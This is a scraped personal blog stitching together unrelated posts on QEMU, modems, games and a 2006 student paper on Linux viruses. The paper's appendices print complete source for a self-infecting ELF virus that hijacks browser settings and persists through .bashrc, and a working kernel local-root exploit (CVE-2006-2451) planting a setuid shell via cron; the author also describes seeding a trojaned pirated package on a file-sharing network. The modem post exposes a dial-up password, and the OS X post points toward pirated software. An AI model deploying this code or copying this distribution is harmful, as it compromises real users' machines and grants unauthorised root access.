Configuration:

• Ubuntu 10.04 Lucid Lynx
• Qemu 0.12.3
• AMD Phenom(tm) II X4 20 Processor
• 4GB Ram
• iPC OSx86 10.5.6 Universal PPF (Final)

Requirements:

An ISO of OS X

Recent version of Qemu.

A processor with virtualization technology, AMD-V or Intel VT-x capable. I’m not sure if it is technically required but it certainly helps.

Lots of Ram and disk space.

Getting OSX 10.5.6 Leopard:

iPC is one of many “distributions” of OS X for non-Apple computers. Check the iPC site for more information on using it. You won’t find any download there though, you’ll have to find a more creative source.

Installation:

First create an image file to hold the installation.

$ qemu-img create osx.img 20GB

This creates a 20 GB image file osx.img in raw format. Specify more GBs if you will want more space but I wouldn’t do any less then 10GB.

Start Qemu with the new image file and your installation ISO.

qemu-system-x86_64 -hda osx.img -vga std -m 2048 -soundhw ac97 -cdrom iPC\ OSx86\ 10.5.6\ Universal\ PPF5\ \(Final\).iso  -boot d

This will start qemu in 64 bit mode. “-hda osx.img” should be the name of the image file you created above. “-cdrom iPC\ OSx86\ 10.5.6\ Universal\ PPF5\ \(Final\).iso” should be the full path to your installation iso. “-m 2048″ is how many megabytes of memory you want to make available to the system. “-soundhw ac97″ is used to emulate the ac97 sound card which is supported by OSX. “-boot d” is used to tell the system to boot of the cdrom first.

If all goes well you should see this message:

Pressing any kill should bring up the language selection menu:

If you don’t and it just stalls at the Apple logo. Try using F8 and then -v to startup with diagnostic messages. That might give you some clues as to what’s going on.

Click next and continue. Then accept the software agreement. Then it asks, “Where do you want to install Mac OS X?” and gives you a blank list of possible installation locations. This is because the image file has not yet been formated. Choose “Utilities” from the top and “Disk Utility”.

Select “QEMU HARDDISK”, choose “erase” from the top and click the “erase” button twice.

The disk image is now formatted so close the Disk Utility. You should not have a destination avaliable to install OS X too. Select it and click “continue”. It is very important that you customize the installation on the next screen so you can install the proper drivers.

It’s very important that you select the 9.5.0 Voodoo Kernel or you will be unable to boot your new system. You will need the LegacyAppleIntelPIIXATA under chipset drivers or your hard drive will not work.

For audio drivers select AC97 Audio which is under Other Audio Drivers. For Ethernet select PCGENRTL8139. If you want to try to get usb to work you will need the Patched USB drivers. Also the responsiveness of the mouse and keyboard can be improved by selecting the PS/2 Keyboard FIX under the fixes section.

Click “Done” and “Install”. Then in about 20 minutes you should have a working OS X installation.

Upon reboot you get a welcome screen asking for the region your in. The rest of the setup is pretty straight forward. You don’t have to register with Apple. Be sure to choose DHCP for network setup. Upon completion you’ll see the beautiful Leopard desktop.

Getting Networking to work

Networking in OS X on qemu has been rather tricky to do but following these directions makes it pretty simple. Close QEMU by shutting down OS X. Modify the qemu command to this:

qemu-system-x86_64 -hda osx.img -vga std -m 2048 -net nic,model=rtl8139 -net user  -no-kvm-irqchip -smb $HOME -soundhw ac97

The magic here is the “-no-kvm-irqchip” which disables a certain accelleration function that causes problems with networking being very slow in OS X. “model=rtl8139″ is chosen because that’s what we selected during installation. “-smb $HOME” is used to allow file transfers between the host and guest operating system.
To share files open finder. Choose Connect to Server… from the “go” menu. Enter “smb://10.0.2.2” in the server address. Choose “Connect as Guest”. Choose a volume and then it should mount it on the left side of the finder.

Getting Sound

If sound doesn’t work try installing the following updated driver.
Qemu ICH AC97 Audio Driver

Other Tweaks

If you want to take advantage multiple cores you can use the option “-smp 3″ which tells qemu to make 3 cores available to the guest machine.

Known Issues

Occasionally the system crashes. It seems to happen most often when I’m downloading large files such as Xcode.

Related posts:

1. Simple Computer
2. Finding Device Drivers

I knew my scanner was working fine because cat /dev/ttyS0 would output the barcode I scanned. I knew I needed a way to direct the output to the keyboard but I didn’t want to write the little program to do it, so I searched and searched and searched. After trying a few outdated programs I finally found Softwedge. It’s very simple and easy to compile but if you don’t even want to go that far there is deb files for 32 bit and 64 bit Debian/Ubuntu.

Just run:

softwedge -c /dev/ttyWhatever

to start capturing all your barcodes from your barcode scanner. It worke perfectly on an old IBM Surepos system.

Hopefully this will help someone who is looking to do the same thing.

No related posts.

Having successfully ascended a Valkyrie on Nethack I moved on to more exciting things like Slash’EM. I have found Slash’EM to be every bit as good as Nethack, a little more challenging and much more interesting. This guide will hopefully get you started in playing and save you some frustrations and many, many stupid deaths.

Survival Tips:

1

I would begin by picking one class and learning all the things that it can do at low levels. Once you have all the functions of one class mastered it will be much easier to learn all the dangers of the Dungeons of Doom. The Monk is probably the easiest class to use, followed by the Valkery and the Samaria.

2

Keep a journal!, this is probably the most helpful thing you can do. Once you start playing and discover that eating kobalds is hazardous to your health, write it down and never do it again unless you are poison resident. You’ll also want to keep track of how much stuff costs so it will be easier to identify later.

3

Don’t quaff from fountains, the risk is not worth the reward unless you are high enough level to take on water demons. Sinks are safe to quaff from, water elementals are slow enough that you can usually take them down without getting hurt, just be sure to take off armor because it will break if you get toxic waste.

4

Kick gray stones, they could be load stones and you don’t want to be stuck with one of them. Touch stone have different messages when you rub gems on them. It’s a good idea to bless them.

5

Dip useless potions such as booze in fountains to create water which can be bless by setting them on an offer and praying. I usually bless 10 potions or so at a time.

6

Drop items on alters to identify blessed/cursed status.

7

Take your time, there is no hurry, unless you are running out of food. I don’t go below dungeon level 4 unless I am at least 5th level.

8

#chat, you never know who will talk to you.

9

Eat, even when not hungry but only if you know it is safe. As a general rule only eat things your pet will eat. Stockpile lichen corpses because they don’t decay you can hold on to them until you are hungry. As a last resort you can pray to satisfy your belly.

10

Don’t leave your pet behind. I used to do this all the time because I got tired of waiting on them. They are very useful. They steal from shops, if trained with treats. For cats and dogs treats are tripe rations and meat balls (healers can make meat balls by casting stone to flesh on a bunch of rocks). For horses it’s carrots, apples and things like that. Pets can also identify if an items is cursed. If it is cursed they won’t walk on it unless “they move reluctantly.” It only takes a few times of using some nasty cursed items to realized that everything needs to be identified.

11

Reflection and Magic resistance are very important. Once you get these you are almost invincible.

No related posts.

About

I am no longer working on this project. Anyone who has the desire can take it over. I would be happy to help in what way I can.

The World Domination Project is a Real Time Strategy game inspired by
the board game Axis and Allies utilizing the Stratagus engine. It will
emphasize strategy and not “see who can build the most units the
fastest.” Resources are not gathered like in other RTS’s, rather they
are distributed after a fixed interval of time based on how much land a
player occupies.

News

Downloads

Downloads are hosted by Sourceforge.
The latest version is 0.4, Choose the one that matches your operating
system.

Screen Shots


Bugs

Please report bugs using sourceforge’s bug tracking system here.

Developement

Developement is done at the project
page at Sourceforge.


Trouble? Complaints? Complements?

You can e-mail me at:

david AT stonefamily DOT cjb DOT net

where the capital words are replaced with @ . . respectively.

hosting by:

No related posts.

I’ve spent many hours trying to get my modem to work in Ubuntu 6.10. The answer was way to simple:

Init3 = AT+MS=34

If you have not tried that yet put it in your wvdial.conf or ppp options whichever method you are using. I tried unsuccessfully to compile many different drivers and many different versions all of them had the no carrier error after dialing out. I have a Dell laptop Latitude 100L. The modem information on lspci is:

00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 01)

It uses the open source kernel module snd_intel8x0m which is included in recent vanilla kernel sources. It could use the closed source slamr module but I have not tried it much since the open source module works.

Installing this Modem in Linux

First, if you havn’t already done so, install the sl-modem-daemon with the command:

sudo apt-get install sl-modem-daemon

this will install the user-level application needed to use the driver. You don’t need to install the sl-modem-source package because this is just the closed source driver provided by Smart Link Inc. You may find it useful but I did not need it.

The configuration for sl-modemd is located in /etc/sl-modem-daemon you may need to change it appropriately to match your country and set DONTSTART=0 if you want the driver module to be automatically loaded. The driver can be loaded with “sudo /etc/init.d/sl-modem-daemon start”. If all goes well you should see your modem device at /dev/ttySL0 if not check dmesg for errors.

I used wvdial to configure my dial-up connection but you can use whatever tool you would like. “sudo apt-get install wvdial” if you don’t already have it. First run sudo wvdialconf to setup the initial configuration file. Sudo nano /etc/wvdial.conf to add specific information about your Internet provider. Be sure to add the line:

Init3 = AT+MS=34

beneath the Init2 line or your connection will not work. This will fix the “No Carrier” error that plagued me for so long. Change the dial-up number, username and password. Save and Exit. sudo wvdial to dial the connection. You only have to run as root the first time after that you can just do wvdial.

#My wvdial.conf file

[Dialer defaults]
# Lines begining with # are comments.
# wvdial will look for this file at  /etc/wvdial.conf  or  /home/LoginName/.wvdial.rc

# Redhat/Fedora have an  Internet Connection Wizard in the popup menus
# ICW will write a two part  /etc/wvdial.conf supporting multiple modem usage.

Modem = /dev/ttySL0
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+MS=34
#  Lack of dialtone acquisition can be due to low line voltage,
#    a common problem in Italy.
#  Try inserting a "dial without waiting": X3
#  Init2 = ATQ0 V1 E1 S0=0 X3 &C1 &D2 +FCLASS=0
#  In case of connection instabilities, specify a lower frequency:
#  Init2 = ATQ0 V1 E1 S0=0 X3 &C1 &D2  +MS=34
ISDN = 0
Modem Type = Analog Modem
Phone =  9474701
# if going through a switch board, a perhaps necessary pause can produced with a comma:
# Phone = 1,Dialout_phone_number
Username = dlstone%nnu
# if Internet Provider is MSN.net, use under Linux:   MSN/LoginName
Password = a;sldkfj1
# the following lines is NEEDED only by slmodemd
Carrier Check = no
# Kinternet appears to add it automatically.

## If CONNECT is achieved but browsing fails, try activating the following line
# Auto DNS = yes
##    To make a logfile wvdial.out
# wvdial 2>&1 | tee wvdial.out
# #  For some Internet providers, the following line is necessary
 Stupid Mode = yes
##  for other wvdial  options, do "man wvdial" or see the documentation in
##    /usr/share/doc/wvdial/
## End wvdial.conf

My /etc/defaults/sl-modem-daemon file

DONTSTART=0

SLMODEMD_DEVICE=auto
SLMODEMD_COUNTRY=USA

OPTS=""
FORCESTART=0

Hopefully, you can enjoy the pleasures of dial-up Internet once again. If you have trouble don’t hesitate to contact me.

Related posts:

1. Linux on Dell Latitude 100L
2. Run OS X in Linux with qemu

Spyware/Viruses
in Linux

By David
Stone

November
28, 2006 AD

CS343 -
Operating Systems I

Fall
Semester, 2006

Dr. Barry
Myers

Abstract

The
purpose of this paper is to investigate the possibility of viruses in
Linux and to demonstrate how viruses work and spread. We will look at
the fundamental security differences between Linux and Windows that
make viruses so common in Windows and almost unheard of in Linux.

Summary

Creating
a Linux virus is trivial but getting it out in the wild and infecting
large amounts of systems is very difficult. Design differences make
Linux much less susceptible to viral infections than Windows.
Security holes are much less common and diversity makes targeting
specific software bugs less effective. Anti-virus software will never
be needed in Linux and education is still the best defense against
viruses and malware.

Introduction

Spyware,
viruses and other malware have become an increasing problem on
Microsoft Windows based systems and have caused many Windows users to
switch over to using other operating systems. I am going to be
focusing on GNU/Linux (hereafter referred to as Linux) because of its
availability and the concepts and ideas about viruses in Linux apply
to other Unix based operating systems such as Mac OS X. Historically,
users of Linux have had virtually no issues with spyware, viruses or
other malware. Many have thought it was just because they did not
have a large enough market share to attract malware authors but the
reality is that Linux is so fundamentally different from Windows that
it is much more resistant to virus or spyware infections and other
forms of malware.

Security
differences between Windows and Linux/OS X

Because
Linux is based on UNIX it is very different from Windows. UNIX was a
multi-user operating system that clearly defined the access rights of
users and the programs they ran. Each user was given a directory,
called home, that they could write to. The user did not have write
access to any other area of the system. This was down so that one
ignorant or malicious user could not compromise the entire system.
But because system administrators needed access to system files and
the ability to install or remove programs the root account was
created. The root account had complete access to every file on the
system and complete control of everything running on the system.
Linux uses the same model for user accounts and access rights.

Windows
has a much different way of approaching user accounts and access
rights. In Windows 3.1 through Windows ME every user and program had
complete access to the entire system. It was not even a true
multi-user system, it could keep different settings and preferences
for each user but it could not stop one user from accessing another
users files. In Windows NT based operating systems true multi-user
support exists. It is possible to create users that do not have
access to the complete system and is possible to configure exactly
how much access they have and limit it in many different ways.
However, because of the president set in Windows 9x and to maintain
backwards compatibility most users and system administrators chose to
give their users complete access to the entire system or at least
almost complete access.

The
brand new Dell system with Windows 2005 Media Center edition (which
is basically the same as Windows XP Home) that I setup in the last
month was configured with a single user account that had access to
the complete system. Windows XP does provide a rather easy was of
creating limited user accounts in the control panel. I have personal
experience using limited accounts to help increase the security of my
system and have found that they do not work very well. The problem is
that programs written for Windows are not designed to run within a
limited user account. Most of them need write access to their data
files and then they keep their data files in a location that limited
users do not have write access to. Because so many Windows programs
are built this way, users are forced to run with administrator
accounts even though it creates a huge security problem. There are
rumors that this problem will be fixed in Windows Vista and users
will be prompted for a password when programs need access to the
complete system. This security oversight is what makes Windows so
much more susceptible to viruses than Linux. Viruses ran in Windows
have complete access to the entire system and viruses ran in Linux
have only access to the user’s files (Moen).

Writing
a Linux virus

Taking
the challenge offered to me by fate I sought out to write the most
devastating virus for Linux ever created. It would certainly not be
the first virus created because more than 60 different viruses are
listed in Rick Moen’s Virus article. These 60 viruses were no
more effective than the one I created was. In the process of writing
this virus I learned the challenges that Linux viruses face and the
requirements for overcoming them.

Writing
a good virus is challenging and the best viruses are written in
assembly language (Bartolich). Since my knowledge of assembly is a
little rusty I decided to use a simple virus called Jingle Bell that
was written in C as my starting point. Its complete source code
provided by Amit Singh together with my changes is included in
appendix A. Using the virus is straight forward. It complies easily
with gcc and infecting a file is as easy as:

./virus
victim

Victim
has to be a binary executable that the current user has write access
to. The procedure for infecting a copy of the "ls" command
is as follows:

$
gcc virus.c -o virus

$
cp /bin/ls ./

$
./ls

ls
virus virus.c

$./virus
./ls

THIS
IS A VIRUS!

$./ls

THIS
IS A VIRUS!

ls
virus virus.c

As
you can see in output of the last command ls was successfully
infected and it printed out the text "THIS IS A VIRUS!"
which is in line 51 of the source code and then continued to do its
normal function of listing the contents of the current directory. The
virus could spread to other executables if the filename of an
executable was provided to ls as an argument.

Even
though we have a working virus we need to find a way to put our virus
onto other systems for it to do any good. The easiest and most
popular method would be to include the virus as part of some other
program that does something or claims to do something entirely
unrelated to infecting your computer. Viruses that behave in this way
are called Trojans and they spread by deceiving people into thinking
that they are legitimate programs. Viruses can also spread by just
infecting as many executables on the host machine as possible in the
hopes that those executables might be shared with other computers.
E-mail viruses are also popular (Strongbad). Once they get on a
computer they search for the address book and send a copy of
themselves to each person in the address book. The nastiest viruses
are the ones that exploit remote security holes in the operating
system and use those to infect a computer over the network. The
infected computer will then try to infect more computers and so on.
Viruses that behave in this way are called worms. If the worm is
created before the security holes are fixed a well written worm could
quickly infect hundreds or thousands of vulnerable computers.
Security holes in web browsers can also be used to infect computers
with virus or other malware. Most viruses or malware employ a
combination of the above techniques to spread themselves.

In
my own virus I wanted first to try to infect as many executables as
possible. The executables are usually located in /bin/, /usr/bin/ and
/usr/local/bin. However, only the root user has write access to these
directories; that means for a virus to infect any important files it
must first become root. Usually this can be done unless one knows the
root password but over the years there have been a few security holes
that have been exploited to gain root access. On July 11, 2006 a
proof of concept exploit was released that used a security bug in
Linux kernels 2.6.13 through 2.6.17.3 that allowed a user to gain
root access (2.6.17.4 was available on kernel.org on June 30, 2006).
The bug involved the prctl() system call which was used to dump the
memory contents of a process for debugging purposes. The problem was
that the memory was dumped to a file at any location on the file
system. A clever way of gaining root access was to dump a process’s
contents into the /etc/cron.d/ directory. If the process had a string
in memory that contained a cron entry and a bash script, it would be
run with root access. Appendix B contains the complete source of this
exploit.

I
tried to include this root exploit in my code but because of the
nature of the prctl() system call, the memory contents were so
unpredictable it was impossible to create a dump file that would
reliably make a cron entry. This exploit could only be used by the
simplest program and not in an automated fashion which is what a
virus requires. All the local root exploits I found at milw0rm.com,
which is a site that contains a database of exploits, either required
user interaction or only worked on a very specific set of packages
with specific versions. I came to the conclusion that I would have to
have my virus do its dirty work without being root.

For
starters a made the virus do something mischievous, like resetting
Firefox’s homepage to whatever I wanted. This was pretty easy to do
since Firefox keeps its preferences file in the user’s home
directory. To be even more annoying I added a line to the user’s
.bashrc file that would reset the user’s homepage every time they
started a terminal. This sort of thing is standard procedure with
Windows malware and it turned out to be fairly easy to do in Linux.
Except in Linux it could only affect one user and fixing the damage
is as easy as delete one line from a text file.

In
order to spread my virus I decided to use the Trojan horse approach.
One of the most commonly pirated pieces of software by Linux users is
Transgaming’s Cedega, a commercial version of WINE that allows Linux
users to run Windows games. I decided to package my own version of
Cedega with my virus included and post it on a major peer-to-peer
file sharing network. As of yet no one has downloaded my virus, but I
expect that a handful will eventually download my virus and a few of
them might actually be infected by it. But because my virus has no
real way to infect other executables since it cannot become root I do
not expect my virus to go very far.

Security
holes in Linux and Windows

Security
holes are not unheard of in Linux but they appear less often and are
less severe than security holes in Windows. First let’s compare the
default web browser of most Linux distributions (Firefox) with the
default web browser of Windows (Internet Explorer). Since we just
want to know why Windows has more malware than Linux we will focus a
single time period and see what security problems the two browsers
had in that time period. Firefox 1.0 was release in November of 2004
and on May of 2005 version 1.0.4 was released. Each of the four minor
revisions was to address security issues. In the same time frame
Microsoft released 20 major patches to IE, most of which were rated
"critical" (Livingston). These critical security problems
meant that malware could be installed automatically on a Windows
machine if the user just clicked on a link. A company by the name of
Scanit did a study of the amount of time it took Microsoft to release
a patch for a vulnerability once it became public. "The firm
found that IE was wide open for a total of 200 days in 2004, or 54%
of the year, to exploits that were "in the wild" on the
Internet (Livingston)." That meant that any script kiddy could
download some html, upload it to a website and every person that
visited that site could be compromised 50% of the time, even if they
had installed the latest Windows updates. Firefox had a few security
problems of it own, even to the point where code could be executed
remotely but in every case a patch was issued before the security
problem was made public. The exploits were always written after the
problem had been fixed.

Everyone
remembers the Sasser and Blaster worms that infected millions of
Windows machines overnight using security vulnerabilities in the DCOM
protocol which is hardly ever used by desktop computers and is
enabled by default. Linux has about 10 total worms all of which were
released weeks sometimes months after patches were issued for the
security holes the worms used (Moen). Very few Linux machines were
even vulnerable to the worms because most of them targeted the BIND
name server which is only used by Internet servers. Actually, none of
the worms would have been able to compromise a desktop system unless
it was running some server software.

The
Open Source Development model

Much
discussion has been made as to whether open source development
creates better software than traditional closed source development.
The primary advantage of open source development is that the source
code and be read by anyone. More eyeballs can find security problems
better than less (Wheeler). Because open source developers are
constantly reviewing the source code for major projects like Firefox
they can find the security holes before the hackers the hackers do.
But because it open source the hackers can see the security hole that
was fixed and then create an exploit for the fixed security bug. This
is why in the above example the exploits were always released after
they were fixed. However in closed source development what usually
happens is that hackers find security holes in software and then the
companies try to patch them. This is what happened to IE when it was
vulnerable 200 days of the year in 2004 because the patches were
released so long after the security holes were found by hackers.

Heterogeneous
software configurations also make Linux less susceptible to
infections. Not everyone who uses Linux runs the same browser, e-mail
client or web server. The diversity of e-mail clients makes it very
difficult for viruses to find where the address book is stored
(Moen). Even if a major security hole in Firefox was found and
exploited users of Epiphany, Konquerer and the 50+ other web browsers
would not be affected. If Red Hat had a configuration problem that
left it wide open to attacks users of other Linux distributions would
have nothing to worry about. I say all this to show that software
diversity makes it much more difficult to develop a virus or worm
that would infect every Linux system in existence.

Conclusion

To
say that Linux is completely free from viruses and malware is not
entirely true. It is, however, much more resistant to it than Windows
is. Root accounts, prompt patching of security holes, and a
heterogeneous mixture of software make Linux a much more difficult
target when developing malware. I would say that is never going to be
necessary to run anti-virus software for Linux, I do not think they
work very well in Windows and they certainly do not belong in Linux.
Education is still the best way to prevent viruses. Never install
software from sources you do not trust. Ubuntu and other
distributions already verify that every package that is installed is
signed by the correct provider. The best defense against viruses and
other attacks is what it has always bee, keep your software up to
date.

Resources

Wheeler,
David A. Secure Programming for Linux and Unix HOWTO. 3
March 2003.
<http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/open-source-security.html>

Strongbad.
Virus E-mail. 28 November 2006.
<http://www.homestarrunner.com/sbemail118.html>

Livingston,
Brian. Firefox vs IE: Speed of Response to Threat of Exploits. 17
May 2005.
<http://techrepublic.com.com/5208-9592-0.html?forumID=88&threadID=174011&start=0>

Singh,
Amit. Viruses on Unix. 28
November 2006.
<http://www.kernelthread.com/publications/security/vunix.html>

Bartolich,
Alexander. The ELF Virus Writing HOWTO.  15 Feb. 2003.
Linux Security.
<http://www.linuxsecurity.com/resource_files/documentation/virus-writing-HOWTO/_html/index.html>

Moen,
Rick. Virus. 12 Oct. 2006.
<http://linuxmafia.com/~rick/faq/index.php?page=virus>

Petreley,
Nicholas. Security Report: Windows vs Linux. 22 Oct 2004.
<http://www.theregister.co.uk/security/security_report_windows_vs_linux/>

Dreyer
& RoMaNSoFt. Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl()
Local Root Exploit. 10 July 2006
<http://www.milw0rm.com/exploits/2004>

Appendix A – Viral code

/*

 * Jingle Bell (with moderate error handling)

 */

#include <stdio.h>

#include <linux/prctl.h>

#include <signal.h>

#include <sys/time.h>

#include <sys/resource.h>

#include <sys/stat.h>

#include <sys/types.h>

#include <sys/param.h>

#include <sys/wait.h>

#include <unistd.h>

#include <stdlib.h>

#include <errno.h>

#include <fcntl.h>

#include <sys/mman.h>
/* the size of our own executable: please configure */

static int V_OFFSET = 9970;

extern int errno;
void do_infect(int, char **, int);
int

main(int argc, char **argv, char **envp)

{
    int len;

    int rval;

    int pid, status;

    int fd_r, fd_w;

    char *tmp;

    char buf[BUFSIZ];
    /*

     * sometimes it may be possible to modify argv[0], for example by

     * using zsh’s ARGV0 variable:

     *

     * zsh# ARGV0=foobar ls

     *

     * In that case this virus misbehaves!

     */
	// My added stuff

	printf("THIS IS A VIRUS!\n");

	// set the homepage

	system(" for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do \n echo \"user_pref(\\\"browser.startup.homepage\\\", \\\"http://www.nnucomputerwhiz.com/linux-virus.html\\\");\" >> $i/prefs.js \n done");

	// edit .bashrc to set the homepage

	system("echo ‘for i in $( find ~/.mozilla/firefox -maxdepth 1 -type d ); do echo \"user_pref(\\\"browser.startup.homepage\\\", \\\"http://www.nnucomputerwhiz.com/linux-virus.html\\\");\" >> $i/prefs.js ; done’ >> ~/.bashrc");

	// end my added stuff
if ((fd_r = open(argv[0], O_RDONLY)) < 0)

        goto XBAILOUT;
    if (lseek(fd_r, V_OFFSET, SEEK_SET) < 0) {

        close(fd_r);

        goto XBAILOUT;

    }
    if ((tmp = tmpnam(NULL)) == NULL) {

        close(fd_r);

        goto BAILOUT;

    }
    if ((fd_w = open(tmp, O_CREAT | O_TRUNC | O_RDWR, 00700)) < 0)

        goto BAILOUT;
    while ((len = read(fd_r, buf, BUFSIZ)) > 0)

        write(fd_w, buf, len);
    close(fd_w);
    if ((pid = fork()) < 0)

        goto BAILOUT;
    /* run the original executable */

    if (pid == 0) {

        execve(tmp, argv, envp);

        exit(127);

    }
    /* Infect */

    do_infect(argc, argv, fd_r);
    close(fd_r);
    do {

        /* wait till you can cleanup */

        if (waitpid(pid, &status, 0) == -1) {

            if (errno != EINTR) {

                rval = -1;

                goto BAILOUT;

            } else {

                rval = status;

                goto BAILOUT;

            }

        }

    }
	while (1);
BAILOUT:

    unlink(tmp);
XBAILOUT:

    exit(rval);

}
void

do_infect(int argc, char **argv, int fd_r)

{

    int fd_t;

    int target, i;

    int done, bytes, length;

	char * targetName;

    void *map;

    struct stat stat;

    char buf[BUFSIZ];
	if (argc < 2)

        return;
    /* nail the first executable on the command line */

    for (target = 1; target < argc; target++)

        if (!access(argv[target], W_OK | X_OK))

			targetName = argv[target];

            goto NAILED;
    return;
NAILED:

    if ((fd_t = open(targetName, O_RDWR)) < 0)

        return;
    fstat(fd_t, &stat);

    length = stat.st_size;
    map = (char *)malloc(length);

    if (!map)

        goto OUT;
    /* assume no short reads or writes, nor any failed lseeks */
    for (i = 0; i < length; i++)

        read(fd_t, map + i, 1);
    lseek(fd_t, 0, SEEK_SET);

    if (ftruncate(fd_t, 0))

        goto OUT;
    done = 0;

    lseek(fd_r, 0, SEEK_SET);

    while (done < V_OFFSET) {

        bytes = read(fd_r, buf, 1);

        write(fd_t, buf, bytes);

        done += bytes;

    }
    for (bytes = 0; bytes < length; bytes++)

        write(fd_t, map + bytes, 1);
    free(map);
OUT:

    close(fd_t);

    return;
Appendix B – Local Root Exploit
/*****************************************************/

/* Local r00t Exploit for:                           */

/* Linux Kernel PRCTL Core Dump Handling             */

/* ( BID 18874 / CVE-2006-2451 )                     */

/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */

/* By:                                               */

/* – dreyer    <luna@aditel.org>   (main PoC code)   */

/* – RoMaNSoFt <roman@rs-labs.com> (local root code) */

/*                                  [ 10.Jul.2006 ]  */

/*****************************************************/
#include <stdio.h>

#include <sys/time.h>

#include <sys/resource.h>

#include <unistd.h>

#include <linux/prctl.h>

#include <stdlib.h>

#include <sys/types.h>

#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {

    int child;

    struct rlimit corelimit;

    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling – Local r00t\n");

    printf("By: dreyer & RoMaNSoFt\n");

    printf("[ 10.Jul.2006 ]\n\n");
    corelimit.rlim_cur = RLIM_INFINITY;

    corelimit.rlim_max = RLIM_INFINITY;

    setrlimit(RLIMIT_CORE, &corelimit);
    printf("[*] Creating Cron entry\n");
    if ( !( child = fork() )) {

        chdir("/etc/cron.d");

        prctl(PR_SET_DUMPABLE, 2);

        sleep(200);

        exit(1);

    }
    kill(child, SIGSEGV);
    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");

    sleep(62);
    printf("[*] Running shell (remember to remove /tmp/sh when finished) …\n");

    system("/tmp/sh -i");

Related posts:

1. Spyware Prevention
2. Spyware Scanners
3. Introduction To Linux